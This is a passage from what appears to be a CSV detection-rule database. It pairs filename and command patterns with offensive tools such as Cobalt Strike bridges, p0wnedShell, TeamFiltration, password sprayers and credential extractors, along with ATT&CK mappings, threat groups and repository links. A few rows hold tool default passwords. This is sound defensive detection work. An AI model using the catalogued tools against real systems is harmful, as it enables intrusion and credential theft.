"*output/NonDCWindows10Computers.txt*",".{0,1000}output\/NonDCWindows10Computers\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54258"
"*output/NonDCWindows11Computers.txt*",".{0,1000}output\/NonDCWindows11Computers\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54259"
"*output/NonDCWindows7Computers.txt*",".{0,1000}output\/NonDCWindows7Computers\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54260"
"*output/PasswordNeverExpire.txt*",".{0,1000}output\/PasswordNeverExpire\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54261"
"*output/payloads/*",".{0,1000}output\/payloads\/.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","54262"
"*output/RatChatPT_unix*",".{0,1000}output\/RatChatPT_unix.{0,1000}","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","N/A","risk of False positive","10","10","16","6","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z","54263"
"*output/RDPMachines.txt*",".{0,1000}output\/RDPMachines\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54264"
"*output/UsersInDomainAdminsGroup.txt*",".{0,1000}output\/UsersInDomainAdminsGroup\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54265"
"*output/UsersLastPasswordChange.txt*",".{0,1000}output\/UsersLastPasswordChange\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54266"
"*output/UsersNoPasswordRequired.txt*",".{0,1000}output\/UsersNoPasswordRequired\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54267"
"*output/UsersPasswordMustChange.txt*",".{0,1000}output\/UsersPasswordMustChange\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54268"
"*output/UsersPasswordNotChanged.txt*",".{0,1000}output\/UsersPasswordNotChanged\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54269"
"*output/WinRMMachines.txt*",".{0,1000}output\/WinRMMachines\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","54270"
"*output: link.bin*",".{0,1000}output\:\slink\.bin.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","false positives expected !","4","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","54271"
"*output: link.dll*",".{0,1000}output\:\slink\.dll.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","false positives expected !","4","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","54272"
"*OutputTokens.txt --onedrive --owa*",".{0,1000}OutputTokens\.txt\s\-\-onedrive\s\-\-owa.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","54273"
"*Out-RundllCommand*",".{0,1000}Out\-RundllCommand.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","54274"
"*OverrideLHOST 360.com*",".{0,1000}OverrideLHOST\s360\.com.{0,1000}","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","0","N/A","N/A","10","10","1466","204","2024-08-20T17:43:35Z","2022-05-08T04:02:33Z","54275"
"*owa */autodiscover/autodiscover.xml* --recon*",".{0,1000}owa\s.{0,1000}\/autodiscover\/autodiscover\.xml.{0,1000}\s\-\-recon.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","54277"
"*OWA Enumeration via ActiveSync timing module --*",".{0,1000}OWA\sEnumeration\svia\sActiveSync\stiming\smodule\s\-\-.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","54278"
"*OWA Spraying via ActiveSync module --*",".{0,1000}OWA\sSpraying\svia\sActiveSync\smodule\s\-\-.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","54279"
"*OWASP/Amass*",".{0,1000}OWASP\/Amass.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","1","#linux","N/A","5","","N/A","","","","54280"
"*OwnerPersist-POST.*",".{0,1000}OwnerPersist\-POST\..{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","1","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","54281"
"*Ox-Bruter.pl*",".{0,1000}Ox\-Bruter\.pl.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://raw.githubusercontent.com/Sup3r-Us3r/scripts/master/fb-brute.pl","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A","54282"
"*OxidResolver.exe*",".{0,1000}OxidResolver\.exe.{0,1000}","offensive_tool_keyword","SharpOxidResolver","search the current domain for computers and get bindings for all of them","T1018 - T1046 - T1016","TA0007","N/A","KNOTWEED","Discovery","https://github.com/S3cur3Th1sSh1t/SharpOxidResolver","1","1","N/A","N/A","9","1","50","9","2020-11-25T08:42:06Z","2020-11-25T08:23:23Z","54283"
"*-p 5000:5000 pador_vuln_server*",".{0,1000}\-p\s5000\:5000\spador_vuln_server.{0,1000}","offensive_tool_keyword","padre","padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/glebarez/padre","1","0","N/A","N/A","8","3","253","24","2024-05-13T14:28:25Z","2019-12-30T13:52:03Z","54284"
"*P@ss4Hagrid29*",".{0,1000}P\@ss4Hagrid29.{0,1000}","offensive_tool_keyword","DumpAADSyncCreds","C# implementation of Get-AADIntSyncCredentials from AADInternals which extracts Azure AD Connect credentials to AD and Azure AD from AAD connect database.","T1555 - T1110","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Hagrid29/DumpAADSyncCreds","1","0","N/A","N/A","10","1","39","3","2023-06-24T16:17:36Z","2022-03-27T18:43:44Z","54285"
"*p0dalirius/Coercer*",".{0,1000}p0dalirius\/Coercer.{0,1000}","offensive_tool_keyword","ADCSKiller","ADCSKiller is a Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. It leverages features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure","T1552.004 - T1003.003 - T1114.002 - T1649","TA0006 - TA0003 - TA0005","N/A","N/A","Exploitation tool","https://github.com/grimlockx/ADCSKiller","1","1","N/A","N/A","N/A","8","710","70","2023-05-19T17:36:37Z","2023-05-19T06:51:41Z","54286"
"*p0dalirius/Coercer*",".{0,1000}p0dalirius\/Coercer.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","54287"
"*p0dalirius/ExtractBitlockerKeys*",".{0,1000}p0dalirius\/ExtractBitlockerKeys.{0,1000}","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","1","N/A","N/A","10","4","368","54","2025-01-31T09:39:55Z","2023-09-19T07:28:11Z","54288"
"*p0dalirius/LDAPWordlistHarvester*",".{0,1000}p0dalirius\/LDAPWordlistHarvester.{0,1000}","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","Black Basta","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","1","N/A","N/A","5","","N/A","","","","54289"
"*p0dalirius/pyLAPS*",".{0,1000}p0dalirius\/pyLAPS.{0,1000}","offensive_tool_keyword","pyLAPS","A simple way to read and write LAPS passwords from linux.","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/p0dalirius/pyLAPS","1","1","#linux","N/A","9","2","105","16","2024-10-28T08:36:38Z","2021-10-05T18:35:21Z","54290"
"*p0f -i eth* -p*",".{0,1000}p0f\s\-i\seth.{0,1000}\s\-p.{0,1000}","offensive_tool_keyword","p0f","P0f is a tool that utilizes an array of sophisticated purely passive traffic fingerprinting mechanisms to identify the players behind any incidental TCP/IP communications","T1046 - T1040","TA0007 - TA0010","N/A","N/A","Sniffing & Spoofing","https://www.kali.org/tools/p0f/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","54291"
"*p0f/p0f.fp*",".{0,1000}p0f\/p0f\.fp.{0,1000}","offensive_tool_keyword","p0f","P0f is a tool that utilizes an array of sophisticated purely passive traffic fingerprinting mechanisms to identify the players behind any incidental TCP/IP communications","T1046 - T1040","TA0007 - TA0010","N/A","N/A","Sniffing & Spoofing","https://www.kali.org/tools/p0f/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","54292"
"*P0rtcu11i5!*",".{0,1000}P0rtcu11i5!.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","0","#linux","N/A","10","6","552","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z","54293"
"*p0wnedADAttacks.cs*",".{0,1000}p0wnedADAttacks\.cs.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54294"
"*p0wnedAmsiBypass.cs*",".{0,1000}p0wnedAmsiBypass\.cs.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54295"
"*p0wnedAwareness.cs*",".{0,1000}p0wnedAwareness\.cs.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54296"
"*p0wnedBinaries.cs*",".{0,1000}p0wnedBinaries\.cs.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54297"
"*p0wnedCredentialUI.cs*",".{0,1000}p0wnedCredentialUI\.cs.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54298"
"*p0wnedEasySystem.cs*",".{0,1000}p0wnedEasySystem\.cs.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54299"
"*p0wnedExecute.cs*",".{0,1000}p0wnedExecute\.cs.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54300"
"*p0wnedExploits.cs*",".{0,1000}p0wnedExploits\.cs.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54301"
"*p0wnedExtensionMethods.cs*",".{0,1000}p0wnedExtensionMethods\.cs.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54302"
"*p0wnedHost.cs*",".{0,1000}p0wnedHost\.cs.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54303"
"*p0wnedHostUserInterface.cs*",".{0,1000}p0wnedHostUserInterface\.cs.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54304"
"*p0wnedHostUtilities.cs*",".{0,1000}p0wnedHostUtilities\.cs.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54305"
"*p0wnedInveigh.cs*",".{0,1000}p0wnedInveigh\.cs.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54306"
"*P0wnedListener.Exe*",".{0,1000}P0wnedListener\.Exe.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54307"
"*p0wnedListenerConsole.cs*",".{0,1000}p0wnedListenerConsole\.cs.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54308"
